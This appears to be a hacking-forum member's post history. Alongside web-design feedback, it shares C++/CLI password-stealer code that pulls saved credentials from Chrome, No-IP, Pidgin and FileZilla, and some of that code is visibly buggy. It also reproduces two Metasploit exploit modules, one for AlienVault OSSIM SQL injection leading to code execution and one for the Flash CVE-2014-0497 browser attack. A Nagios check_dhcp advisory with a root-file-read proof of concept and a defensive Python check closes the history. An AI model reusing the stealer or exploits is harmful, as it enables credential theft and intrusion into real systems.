
M.cod3r

Members
  • Posts

    12

Posts posted by M.cod3r

  1. Remove the pattern from the header and footer, or replace it with something more subtle: Subtle Patterns | Free textures for your next web project.

    The shadow (or whatever that is meant to be): change its colour to a dark grey and make it smaller on both the header and the footer.

    You could make the blue a little lighter.

    Trim the footer as well; it seems far too big :\

    I also recommend using some colour palettes:

    Color Combinations | Color Schemes | Color Palettes

    Design Seeds® | for all who ♥ color

    Color Scheme Designer 3

    If you do what was said above, it will look even better.

  2. My respects, if it was made by you.

    Later edit: More disappointing: ??? [C++] Password Stealer Codes

    With all due respect, it is not 100% made by me! And if you noticed, it is a completely different variant from what you are showing me!

    Hi, please change the topic title from [C++] to [C++/CLI]; the code is in Microsoft's variant of C++ and includes .NET components. It is not pure C++.

    Solved!

  3. Google Chrome:


    public:
    void StealChrome()
    {
    System::String ^cpass = System::String::empty;
    System::String ^datapath = Environment::GetFolderPath(Environment::SpecialFolder::LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Web Data";
    if (File::Exists(datapath))
    {
    SqlClient::SqlConnection ^SQLconnect = gcnew SqlClient::SqlConnection();
    SqlClient::SqlCommand ^SQLcommand = nullptr;
    SQLconnect->ConnectionString = "Data Source=" + datapath + ";";
    SQLconnect->Open();
    SQLcommand = SQLconnect->CreateCommand();
    SQLcommand->CommandText = "SELECT * FROM logins";
    SqlClient::SqlDataReader ^SQLreader = SQLcommand->ExecuteReader();
    System::String ^host = nullptr;
    System::String ^user = nullptr;
    System::String ^pass = nullptr;
    while (SQLreader->Read())
    {
    host = SQLreader["origin_url"];
    user = SQLreader["username_value"];
    pass = Decrypt(SQLreader["password_value"]);
    if ((user != "") & (pass != ""))
    {
    pss->Text = host;
    cpass = ("=============================" + System::Environment::NewLine + "Host: " + host + System::Environment::NewLine + "Username: " + user + System::Environment::NewLine + "Password: " + pass + System::Environment::NewLine + "=============================" + System::Environment::NewLine + " ");
    }
    }
    delete SQLcommand;
    SQLconnect->Close();
    }

    }
    private:
    [DllImport("Crypt32.dll", SetLastError=true, CharSet=System::Runtime::InteropServices::CharSet::Auto)]
    static bool CryptUnprotectData(DATA_BLOB %pDataIn, System::String ^szDataDescr, DATA_BLOB %pOptionalEntropy, IntPtr pvReserved, CRYPTPROTECT_PROMPTSTRUCT %pPromptStruct, int dwFlags, DATA_BLOB %pDataOut);
    [Flags()]
    private enum class CryptProtectPromptFlags: int
    {
    CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0X1,
    CRYPTPROTECT_PROMPT_ON_PROTECT = 0X2
    };
    [StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
    private value class CRYPTPROTECT_PROMPTSTRUCT
    {
    public:
    int cbSize;
    CryptProtectPromptFlags dwPromptFlags;
    IntPtr hwndApp;
    System::String ^szPrompt;
    };
    [StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
    private value class DATA_BLOB
    {
    public:
    int cbData;
    IntPtr pbData;
    };
    public:
    static System::String ^Decrypt(array<System::Byte> ^Datas)
    {
    DATA_BLOB inj = DATA_BLOB();
    DATA_BLOB Ors = DATA_BLOB();
    GCHandle Ghandle = GCHandle::Alloc(Datas, GCHandleType::Pinned);
    inj.pbData = Ghandle.AddrOfPinnedObject();
    inj.cbData = Datas->Length;
    Ghandle.Free();
    DATA_BLOB temppOptionalEntropy1 = DATA_BLOB();
    CRYPTPROTECT_PROMPTSTRUCT temppPromptStruct2 = CRYPTPROTECT_PROMPTSTRUCT();
    CryptUnprotectData(inj, nullptr, temppOptionalEntropy1, System::IntPtr::Zero, temppPromptStruct2, 0, Ors);
    array<System::Byte> ^Returned = gcnew array<System::Byte>(Ors.cbData + 1);
    Marshal::Copy(Ors.pbData, Returned, 0, Ors.cbData);
    System::String ^TheString = Encoding::Default->GetString(Returned);
    return TheString->Substring(0, TheString->Length - 1);
    }
    };

    No-ip:


    public:
    System::String ^NoIPSteal()
    {
    IpRecord = nullptr;
    System::String ^Username = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Username", nullptr);
    System::String ^Password = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Password", nullptr);
    System::String ^NL = System::Environment::NewLine;
    IpRecord = "===========No-Ip=============" + NL + "Username : " + Username + System::Environment::NewLine + "Password : " + base64Decode(Password) + System::Environment::NewLine + "=============================" + NL;
    return nullptr;
    }
    private:
    System::String ^Base64Dec0de(System::String ^%Base64String)
    {
    static array<System::Byte> ^Enc = nullptr;
    array<System::Byte> ^b = nullptr;
    array<System::Byte> ^Out = nullptr;
    int i = 0;
    int j = 0;
    int L = 0;
    array<System::Byte> ^Dec = gcnew array<System::Byte>(256);
    if (Enc->Length == 0) //byval 0&-Ptr = not initialized
    {
    Enc = System::Text::ASCIIEncoding::ASCII->GetBytes("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
    }
    for (i = 0; i <= 255; i++)
    {
    Dec[i] = 64;
    }
    for (i = 0; i <= 63; i++)
    {
    Dec[Enc[i]] = System::Convert::ToByte(i);
    }
    L = Base64String->Length;
    b = System::Text::ASCIIEncoding::ASCII->GetBytes(Base64String);
    Array::Resize(Out, (L / 4) * 3);
    for (i = 0; i <= b->GetUpperBound(0); i += 4)
    {
    Out[j] = System::Convert::ToByte((Dec[b[i]] * 4) | (Dec[b[i + 1]] / 16));
    j = j + 1;
    Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 1]] & 15) * 16 | (Dec[b[i + 2]] / 4));
    j = j + 1;
    Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 2]] & 3) * 64 | Dec[b[i + 3]]);
    j = j + 1;
    }
    if (b[L - 2] == 61)
    {
    j = 2;
    }
    else if (b[L - 1] == 61)
    {
    j = 1;
    }
    else
    {
    j = 0;
    }
    Array::Resize(Out, Out->GetUpperBound(0) - j + 1);
    Base64Dec = System::Text::ASCIIEncoding::ASCII->GetString(Out);
    return nullptr;
    }

    Pidgin:

    public:
    System::String ^PidginSteal()
    {
    System::String ^tempPidginSteal = nullptr;
    XmlDocument ^ReadXML = gcnew XmlDocument();
    int i = 0;
    System::Object ^OutAll = nullptr;
    tempPidginSteal = "";
    System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("appdata") + "\\.purple\\accounts.xml";
    if (File::Exists(FilePath) != true)
    {
    return tempPidginSteal;
    }
    else
    {
    try
    {
    ReadXML->Load(FilePath);
    XmlNodeList ^Protocol = ReadXML->GetElementsByTagName("protocol");
    XmlNodeList ^Username = ReadXML->GetElementsByTagName("name");
    XmlNodeList ^Password = ReadXML->GetElementsByTagName("password");
    for (i = 0; i < Protocol->Count; i++)
    {
    OutAll = OutAll->ToString() + "============Pidgin===========" + System::Environment::NewLine + "Protocol: " + Protocol[i]->InnerText + "\r\n" + "Username: " + Username[i]->InnerText + "\r\n" + "Password: " + Password[i]->InnerText + "\r\n" + System::Environment::NewLine + "=============================" + System::Environment::NewLine;
    }
    tempPidginSteal = OutAll;
    }
    catch (Exception ^ex)
    {
    }
    }
    return tempPidginSteal;
    }

    FileZilla:


    public:
    System::String ^FileZillaSteal()
    {
    System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("APPDATA") + "\\FileZilla\\recentservers.xml";
    System::String ^FileBuffer = Microsoft::VisualBasic::Constants::vbNull;
    System::String ^NL = System::Environment::NewLine;
    FileBuffer = Microsoft::VisualBasic::FileIO::FileSystem::OpenTextFileReader(FilePath)::ReadToEnd();
    System::String ^str = nullptr;
    System::String ^Output = nullptr;
    array<System::String^> ^TempData = nullptr;
    TempData = FileBuffer->Split("\r\n");
    FileBuffer = nullptr;
    for each (System::String ^str in TempData)
    {
    if (str->Contains("</Host>"))
    {
    str->Replace("<Host>", "")->Replace("</Host>", "");
    Output = Output + "Host : " + str + NL;
    }
    if (str->Contains("</User>"))
    {
    str->Replace("<User>", "")->Replace("</User>", "");
    Output = Output + "Username : " + str + NL;
    }
    if (str->Contains("</Pass>"))
    {
    str->Replace("<Pass>", "")->Replace("</Pass>", "");
    Output = Output + "Password : " + str + NL + NL;
    }
    }
    Output = "=============FileZilla================" + System::Environment::NewLine + Output->Replace("<User>", "")->Replace("</User>", "")->Replace("<Host>", "")->Replace("</Host>", "")->Replace("<Pass>", "")->Replace("</Pass>", "") + System::Environment::NewLine + "=============FileZilla================" + System::Environment::NewLine;
    ShoitZilla = Output;
    return nullptr;
    }

  4. ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info={})
        super(update_info(info,
          'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",
          'Description' => %q{
            This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault
            OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an
            active admin session ID. If an administrator level user is identified, remote code execution
            can be gained by creating a high priority policy with an action containing our payload.
          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'Sasha Zivojinovic', # SQLi discovery
              'xistence <xistence[at]0x90.nl>' # Metasploit module
            ],
          'References' =>
            [
              ['OSVDB', '106252'],
              ['EDB', '33006']
            ],
          'DefaultOptions' =>
            {
              'SSL' => true,
              'WfsDelay' => 10
            },
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Payload' =>
            {
              'Compat' =>
                {
                  'RequiredCmd' => 'generic perl python',
                }
            },
          'Targets' =>
            [
              ['Alienvault OSSIM 4.3', {}]
            ],
          'Privileged' => true,
          'DisclosureDate' => "Apr 24 2014",
          'DefaultTarget' => 0))

        register_options(
          [
            Opt::RPORT(443),
            OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
          ], self.class)
      end

      def check
        marker = rand_text_alpha(6)
        sqli_rand = rand_text_numeric(4+rand(4))
        sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
        sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"

        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
          'vars_get' => { 'date_from' => sqli }
        })

        if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
          return Exploit::CheckCode::Vulnerable
        else
          print_status("#{res.body}")
          return Exploit::CheckCode::Safe
        end
      end

      def exploit
        marker = rand_text_alpha(6)
        sqli_rand = rand_text_numeric(4+rand(4))
        sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
        sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"

        print_status("#{peer} - Trying to grab admin session through SQLi")
        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
          'vars_get' => { 'date_from' => sqli }
        })

        if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
          admin_session = $1
          @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
          print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
        else
          fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
        end

        # Creating an Action containing our payload, which will be executed by any event (not only alarms)
        action = rand_text_alpha(8+(rand(8)))
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),
          'cookie' => @cookie,
          'vars_post' => {
            'action' => 'new',
            'action_name' => action,
            'descr' => action,
            'action_type' => '2',
            'only' => 'on',
            'cond' => 'True',
            'exec_command' => payload.encoded
          }
        })

        if res && res.code == 200
          print_status("#{peer} - Created Action [ #{action} ]")
        else
          fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
        end

        # Retrieving the Action ID, used to clean up the action after successful exploitation
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
          'cookie' => @cookie,
          'vars_post' => {
            'page' => '1',
            'rp' => '2000'
          }
        })

        if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
          @action_id = $1
          print_status("#{peer} - Action ID is [ #{@action_id} ]")
        else
          fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
        end

        # Retrieving the policy data, necessary for proper cleanup after successful exploitation
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
          'cookie' => @cookie,
          'vars_get' => {
            'm_opt' => 'configuration',
            'sm_opt' => 'threat_intelligence',
            'h_opt' => 'policy'
          }
        })

        if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
          policy_ctx = $1
          policy_group = $2
          print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
        else
          fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
        end

        # Creating policy which will be triggered by any source/destination
        policy = rand_text_alpha(8+(rand(8)))
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
          'cookie' => @cookie,
          'vars_post' => {
            'descr' => policy,
            'active' => '1',
            'group' => policy_group,
            'ctx' => policy_ctx,
            'order' => '1', # Makes this the first policy, overruling all the other policies
            'action' => 'new',
            'sources[]' => '00000000000000000000000000000000', # Source is ANY
            'dests[]' => '00000000000000000000000000000000', # Destination is ANY
            'portsrc[]' => '0', # Any source port
            'portdst[]' => '0', # Any destination port
            'plug_type' => '1', # Taxonomy
            'plugins[0]' => 'on',
            'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found
            'tax_pt' => '0',
            'tax_cat' => '0',
            'tax_subc' => '0',
            'mboxs[]' => '00000000000000000000000000000000',
            'rep_act' => '0',
            'rep_sev' => '1',
            'rep_rel' => '1',
            'rep_dir' => '0',
            'ev_sev' => '1',
            'ev_rel' => '1',
            'tzone' => 'Europe/Amsterdam',
            'date_type' => '1',
            'begin_hour' => '0',
            'begin_minute' => '0',
            'begin_day_week' => '1',
            'begin_day_month' => '1',
            'begin_month' => '1',
            'end_hour' => '23',
            'end_minute' => '59',
            'end_day_week' => '7',
            'end_day_month' => '31',
            'end_month' => '12',
            'actions[]' => @action_id,
            'sim' => '1',
            'priority' => '1',
            'qualify' => '1',
            'correlate' => '0', # Don't make any correlations
            'cross_correlate' => '0', # Don't make any correlations
            'store' => '0' # We don't want to store anything :)
          }
        })

        if res && res.code == 200
          print_status("#{peer} - Created Policy [ #{policy} ]")
        else
          fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
        end

        # Retrieve policy ID, needed for proper cleanup after successful exploitation
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
          'cookie' => @cookie,
          'vars_get' => {
            'ctx' => policy_ctx,
            'group' => policy_group
          },
          'vars_post' => {
            'page' => '1',
            'rp' => '2000'
          }
        })

        if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
          @policy_id = $1
          print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
        else
          fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
        end

        # Reload the policies to make our new policy active
        print_status("#{peer} - Reloading Policies")
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
          'cookie' => @cookie,
          'vars_get' => {
            'what' => 'policies',
            'back' => '../policy/policy.php'
          }
        })

        if res && res.code == 200
          print_status("#{peer} - Policies reloaded!")
        else
          fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
        end

        # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
        dont_exist = rand_text_alpha(8+rand(4))
        print_status("#{peer} - Triggering policy and action by requesting a non existing url")
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, dont_exist),
          'cookie' => @cookie
        })

        if res and res.code == 404
          print_status("#{peer} - Payload delivered")
        else
          fail_with(Failure::Unknown, "#{peer} - Payload failed!")
        end
      end

      def cleanup
        begin
          # Clean up, retrieve token so that the policy can be removed
          print_status("#{peer} - Cleaning up")
          res = send_request_cgi({
            'method' => 'POST',
            'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
            'cookie' => @cookie,
            'vars_post' => { 'f_name' => 'delete_policy' }
          })

          if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
            token = $1
            print_status("#{peer} - Token [ #{token} ] retrieved")
          else
            print_warning("#{peer} - Unable to retrieve token")
          end

          # Remove our policy
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
            'cookie' => @cookie,
            'vars_get' => {
              'confirm' => 'yes',
              'id' => @policy_id,
              'token' => token
            }
          })

          if res && res.code == 200
            print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
          else
            print_warning("#{peer} - Unable to remove Policy ID")
          end

          # Remove our action
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
            'cookie' => @cookie,
            'vars_get' => {
              'id' => @action_id,
            }
          })

          if res && res.code == 200
            print_status("#{peer} - Action ID [ #{@action_id} ] removed")
          else
            print_warning("#{peer} - Unable to remove Action ID")
          end

          # Reload the policies to revert back to the state before exploitation
          print_status("#{peer} - Reloading Policies")
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
            'cookie' => @cookie,
            'vars_get' => {
              'what' => 'policies',
              'back' => '../policy/policy.php'
            }
          })

          if res && res.code == 200
            print_status("#{peer} - Policies reloaded!")
          else
            fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
          end
        ensure
          super # mixins should be able to cleanup even in case of Exception
        end
      end
    end

    @ :)

  5. ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::BrowserExploitServer

    def initialize(info={})
    super(update_info(info,
    'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",
    'Description' => %q{
    This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
    before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
    integer underflow in several avm2 instructions, which can be turned into remote code
    execution under the context of the user, as exploited in the wild in February 2014. This
    module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
    SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
    rop chains for several Flash 11 versions, as exploited in the wild.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Unknown', # vulnerability discovery and exploit in the wild
    'juan vazquez' # msf module
    ],
    'References' =>
    [
    [ 'CVE', '2014-0497' ],
    [ 'OSVDB', '102849' ],
    [ 'BID', '65327' ],
    [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
    [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ],
    [ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ]
    ],
    'Payload' =>
    {
    'Space' => 1024,
    'DisableNops' => true
    },
    'DefaultOptions' =>
    {
    'InitialAutoRunScript' => 'migrate -f',
    'Retries' => false
    },
    'Platform' => 'win',
    # Versions targeted in the wild:
    # [*] Windows 8:
    # 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
    # 11,6,602,167, 11,6,602,171 ,11,6,602,180
    # 11,7,700,169, 11,7,700,202, 11,7,700,224
    # [*] Before windows 8:
    # 11,0,1,152,
    # 11,1,102,55, 11,1,102,62, 11,1,102,63
    # 11,2,202,228, 11,2,202,233, 11,2,202,235
    # 11,3,300,257, 11,3,300,273
    # 11,4,402,278
    # 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
    # 11,6,602,168, 11,6,602,171, 11,6,602,180
    # 11,7,700,169, 11,7,700,202
    # 11,8,800,97, 11,8,800,50
    'BrowserRequirements' =>
    {
    :source => /script|headers/i,
    :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
    :method => "LoadMovie",
    :os_name => Msf::OperatingSystems::WINDOWS,
    :ua_name => Msf::HttpClients::IE,
    :flash => lambda { |ver| ver =~ /^11\./ }
    },
    'Targets' =>
    [
    [ 'Automatic', {} ]
    ],
    'Privileged' => false,
    'DisclosureDate' => "Feb 5 2014",
    'DefaultTarget' => 0))
    end

    def exploit
    @swf = create_swf
    super
    end

    def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
    print_status("Sending SWF...")
    send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
    return
    end

    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = get_profile(tag)
    profile[:tried] = false unless profile.nil? # to allow request the swf
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
    end

    def exploit_template(cli, target_info)

    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="id=<%=shellcode%>" />
    <param name="Play" value="true" />
    </object>
    </body>
    </html>
    |

    return html_template, binding()
    end

    def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
    end

    end

  6. =============================================
    - Release date: 15.05.2014
    - Discovered by: Dawid Golunski
    - Severity: Moderate
    =============================================


    I. VULNERABILITY
    -------------------------

    check_dhcp - Nagios Plugins <= 2.0.1 Arbitrary Option File Read


    II. BACKGROUND
    -------------------------

    "Nagios is an open source computer system monitoring, network monitoring and
    infrastructure monitoring software application. Nagios offers monitoring and
    alerting services for servers, switches, applications, and services.
    It alerts the users when things go wrong and alerts them a second time when
    the problem has been resolved.

    Nagios Plugins (Official)

    The Nagios Plugins Development Team maintains a bundle of more than fifty
    standard plugins for Nagios and other monitoring applications that use the
    straightforward plugin interface originally invented by the Nagios folks.
    Each plugin is a stand-alone command line tool that provides a specific type
    of check. Typically, your monitoring software runs these plugins to determine
    the current status of hosts and services on your network.

    Some of the provided plugins let you check local system metrics (such as load
    averages, processes, or disk space usage), others use various network protocols
    (such as ICMP, SNMP, or HTTP) to perform remote checks.
    This allows for checking a large number of common host and service types.


    * check_dhcp plugin

    This plugin tests the availability of DHCP servers on a network."

    III. INTRODUCTION
    -------------------------

    The check_dhcp plugin, which is part of the official Nagios Plugins package, contains
    a vulnerability that allows a malicious attacker to read parts of INI
    config files belonging to root on a local system. It could allow an attacker
    to obtain sensitive information, like passwords, that should only be accessible
    to the root user.

    The vulnerability is due to the check_dhcp plugin having root SUID permissions and
    inappropriate access control when reading a user-provided config file.

    IV. DESCRIPTION
    -------------------------


    check_dhcp requires root SUID permission on the program binary in order to run
    correctly. A default installation of check_dhcp from sources sets
    the setuid bit on the file automatically:

    # ./configure ; make ; make install

    # ls -l /usr/local/nagios/libexec/check_dhcp
    -r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp


    As we can see in the provided help, the plugin allows reading options from a
    supplied config file via the --extra-opts option:

    # /usr/local/nagios/libexec/check_dhcp --help
    check_dhcp v2.0.1 (nagios-plugins 2.0.1)
    ...
    Usage:
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    Options:
    ...
    --extra-opts=[section][@file]
    Read options from an ini file. See
    https://www.nagios-plugins.org/doc/extra-opts.html
    for usage and examples.


    The option could be used to read parts of any INI-format config file
    available on the system. Because check_dhcp runs as root (thanks
    to the SETUID bit) and neither drops root privileges when accessing the
    config file nor checks whether the given file should be accessible to the
    user executing it, any root-owned INI config file can be accessed this way by an
    unprivileged user on the local system.

    Ironically, the extra-opts.html document states
    "The initial use case for this functionality is for hiding passwords, so
    you do not have to define sensitive credentials in the Nagios configuration
    and these options won't appear in the command line."


    V. PROOF OF CONCEPT
    -------------------------

    A good example of a program that stores configuration in INI format is MySQL.
    Administrators often save MySQL credentials in /root/.my.cnf to avoid having
    to type them each time they run the mysql client. Storing MySQL passwords in
    a config file is also suggested for safety in the MySQL docs:
    http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html

    An example mysql config file could look like this:

    # cat /root/.my.cnf
    [mysqldump]
    quick

    [mysql]
    # saved password for the mysql root user
    password=myRootSecretMysqlPass123


    If an unprivileged attacker had access to a system containing the SUID binary of
    the check_dhcp plugin, he could easily use it to retrieve the password contained
    in the /root/.my.cnf file:

    [attacker@localhost ~]$ id
    uid=500(attacker) gid=500(attacker) groups=500(attacker)

    [attacker@localhost ~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=mysql@/root/.my.cnf
    /usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=myRootSecretMysqlPass123'
    Usage:
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]


    As we can see, the contents of the 'mysql' section of the /root/.my.cnf option
    file are printed as part of the error message, revealing them to
    the attacker.



    VI. BUSINESS IMPACT
    -------------------------

    A malicious user with local access to a system where the check_dhcp plugin is
    installed with SUID could exploit this vulnerability to read any INI-format
    config files owned by root and potentially extract sensitive information.

    VII. SYSTEMS AFFECTED
    -------------------------

    Systems with the check_dhcp SUID binary installed as part of Nagios Plugins 2.0.1 or older
    are vulnerable.

    VIII. SOLUTION
    -------------------------

    Remove the SETUID permission bit from the check_dhcp binary if the plugin is not used.
    The vendor has been informed about the vulnerability prior to the release of this advisory.
    Install a newer version of the plugin when released by the vendor.

    IX. REFERENCES
    -------------------------

    http://exchange.nagios.org/directory/Plugins/*-Plugin-Packages/Nagios-Plugins-%28Official%29/details
    http://www.nagios-plugins.org/download/nagios-plugins-2.0.1.tar.gz
    https://nagios-plugins.org/doc/extra-opts.html
    http://en.wikipedia.org/wiki/Setuid
    http://en.wikipedia.org/wiki/INI_file
    http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html

    http://legalhackers.com/advisories/nagios-check_dhcp.txt

    X. CREDITS
    -------------------------

    The vulnerability has been discovered by Dawid Golunski
    dawid (at) legalhackers (dot) com
    legalhackers.com

    XI. REVISION HISTORY
    -------------------------

    May 12th, 2014: Advisory created

    XII. LEGAL NOTICES
    -------------------------

    The information contained within this advisory is supplied "as-is" with
    no warranties or guarantees of fitness of use or otherwise. I accept no
    responsibility for any damage caused by the use or misuse of this information.
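
The access control the advisory says is missing, written as an added example in Python (not code from the advisory or from the Nagios Plugins project): it parses the --extra-opts=[section][@file] form, refuses a file the real (invoking) user cannot read, and returns the section as --key=value options. The INI sample is constructed after the advisory's /root/.my.cnf; os.access() checking the real uid rather than the effective one is the point a setuid program needs here.

```python
import configparser
import os
import tempfile

# Added example (not from the advisory or the Nagios Plugins code base).
# A setuid-root program that opens a user-chosen path with its effective
# identity reads anything root can read. os.access() evaluates permissions
# against the *real* uid/gid, i.e. the invoking user, so checking it first
# refuses files that user could not open on their own.


def parse_extra_opts(spec, default_section="check_dhcp", default_file=None):
    """Split 'section@/path/file' into (section, path); both parts are optional."""
    section, _, path = spec.partition("@")
    return (section or default_section, path or default_file)


def read_extra_opts(section, path):
    """Return [section] of an INI file as --key=value options, but only if
    the real user may read the file."""
    if not os.access(path, os.R_OK):
        raise PermissionError(f"{path}: not readable by the invoking user")
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    parser.optionxform = str  # keep option names case-sensitive
    with open(path, encoding="utf-8") as handle:
        parser.read_file(handle)
    if not parser.has_section(section):
        return []
    return [
        f"--{key}" if value is None else f"--{key}={value}"
        for key, value in parser.items(section)
    ]


# Constructed sample mirroring the advisory's /root/.my.cnf example.
SAMPLE_MY_CNF = """[mysqldump]
quick

[mysql]
# saved password for the mysql root user
password=myRootSecretMysqlPass123
"""


def demo():
    """Write the sample to a temporary file, read its [mysql] section, then
    make the file unreadable and confirm the reader refuses it."""
    with tempfile.TemporaryDirectory() as tmp:
        cnf = os.path.join(tmp, "my.cnf")
        with open(cnf, "w", encoding="utf-8") as handle:
            handle.write(SAMPLE_MY_CNF)
        section, path = parse_extra_opts(f"mysql@{cnf}")
        options = read_extra_opts(section, path)
        # root bypasses mode bits, so the refusal is only observable as a
        # non-root user; None records that the check was skipped.
        refused = None
        if os.name == "posix" and os.geteuid() != 0:
            os.chmod(path, 0)
            try:
                read_extra_opts(section, path)
                refused = False
            except PermissionError:
                refused = True
        return {"options": options, "refused_unreadable": refused}


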